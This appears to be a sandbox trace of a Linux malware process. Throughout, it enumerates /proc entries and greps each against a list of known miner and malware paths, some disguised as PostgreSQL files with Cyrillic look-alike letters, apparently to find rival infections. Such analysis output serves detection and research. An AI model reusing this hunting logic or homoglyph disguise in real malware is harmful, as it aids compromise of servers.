/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1246
-
-
/bin/grepgrep exe4⤵PID:1249
-
-
/bin/lsls -latrh /proc/fb4⤵PID:1248
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1251
-
-
/bin/grepgrep exe4⤵PID:1254
-
-
/bin/lsls -latrh /proc/filesystems4⤵PID:1253
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1256
-
-
/bin/grepgrep exe4⤵PID:1259
-
-
/bin/lsls -latrh /proc/fs4⤵PID:1258
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1261
-
-
/bin/grepgrep exe4⤵PID:1264
-
-
/bin/lsls -latrh /proc/interrupts4⤵PID:1263
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1266
-
-
/bin/grepgrep exe4⤵PID:1269
-
-
/bin/lsls -latrh /proc/iomem4⤵PID:1268
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1271
-
-
/bin/grepgrep exe4⤵PID:1274
-
-
/bin/lsls -latrh /proc/ioports4⤵PID:1273
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1276
-
-
/bin/grepgrep exe4⤵PID:1279
-
-
/bin/lsls -latrh /proc/irq4⤵PID:1278
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1281
-
-
/bin/grepgrep exe4⤵PID:1284
-
-
/bin/lsls -latrh /proc/kallsyms4⤵PID:1283
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1286
-
-
/bin/grepgrep exe4⤵PID:1291
-
-
/bin/lsls -latrh /proc/kcore4⤵PID:1290
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1293
-
-
/bin/grepgrep exe4⤵PID:1297
-
-
/bin/lsls -latrh /proc/keys4⤵PID:1296
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1300
-
-
/bin/grepgrep exe4⤵PID:1303
-
-
/bin/lsls -latrh /proc/key-users4⤵PID:1302
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1306
-
-
/bin/grepgrep exe4⤵PID:1310
-
-
/bin/lsls -latrh /proc/kmsg4⤵PID:1309
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1312
-
-
/bin/grepgrep exe4⤵PID:1316
-
-
/bin/lsls -latrh /proc/kpagecgroup4⤵PID:1315
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1319
-
-
/bin/grepgrep exe4⤵PID:1323
-
-
/bin/lsls -latrh /proc/kpagecount4⤵PID:1322
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1326
-
-
/bin/grepgrep exe4⤵PID:1329
-
-
/bin/lsls -latrh /proc/kpageflags4⤵PID:1328
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1332
-
-
/bin/grepgrep exe4⤵PID:1336
-
-
/bin/lsls -latrh /proc/loadavg4⤵PID:1335
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1338
-
-
/bin/grepgrep exe4⤵PID:1342
-
-
/bin/lsls -latrh /proc/locks4⤵PID:1341
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1345
-
-
/bin/grepgrep exe4⤵PID:1349
-
-
/bin/lsls -latrh /proc/meminfo4⤵PID:1348
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1352
-
-
/bin/grepgrep exe4⤵PID:1355
-
-
/bin/lsls -latrh /proc/misc4⤵PID:1354
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1358
-
-
/bin/grepgrep exe4⤵PID:1362
-
-
/bin/lsls -latrh /proc/modules4⤵PID:1361
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1364
-
-
/bin/grepgrep exe4⤵PID:1368
-
-
/bin/lsls -latrh /proc/mounts4⤵PID:1367
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1371
-
-
/bin/grepgrep exe4⤵PID:1374
-
-
/bin/lsls -latrh /proc/net4⤵PID:1373
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1377
-
-
/bin/grepgrep exe4⤵PID:1381
-
-
/bin/lsls -latrh /proc/pagetypeinfo4⤵PID:1380
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1383
-
-
/bin/lsls -latrh /proc/partitions4⤵PID:1386
-
-
/bin/grepgrep exe4⤵PID:1387
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1390
-
-
/bin/grepgrep exe4⤵PID:1394
-
-
/bin/lsls -latrh /proc/sched_debug4⤵PID:1393
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1397
-
-
/bin/grepgrep exe4⤵PID:1400
-
-
/bin/lsls -latrh /proc/schedstat4⤵PID:1399
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1403
-
-
/bin/grepgrep exe4⤵PID:1407
-
-
/bin/lsls -latrh /proc/self4⤵PID:1406
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1409
-
-
/bin/grepgrep exe4⤵PID:1413
-
-
/bin/lsls -latrh /proc/slabinfo4⤵PID:1412
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1416
-
-
/bin/grepgrep exe4⤵PID:1419
-
-
/bin/lsls -latrh /proc/softirqs4⤵PID:1418
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1421
-
-
/bin/grepgrep exe4⤵PID:1424
-
-
/bin/lsls -latrh /proc/stat4⤵PID:1423
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1426
-
-
/bin/grepgrep exe4⤵PID:1429
-
-
/bin/lsls -latrh /proc/swaps4⤵PID:1428
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1431
-
-
/bin/grepgrep exe4⤵PID:1434
-
-
/bin/lsls -latrh /proc/sys4⤵PID:1433
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1436
-
-
/bin/grepgrep exe4⤵PID:1439
-
-
/bin/lsls -latrh /proc/sysrq-trigger4⤵PID:1438
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1441
-
-
/bin/grepgrep exe4⤵PID:1444
-
-
/bin/lsls -latrh /proc/sysvipc4⤵
- System Network Configuration Discovery
PID:1443
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1446
-
-
/bin/grepgrep exe4⤵PID:1449
-
-
/bin/lsls -latrh /proc/thread-self4⤵PID:1448
-
-
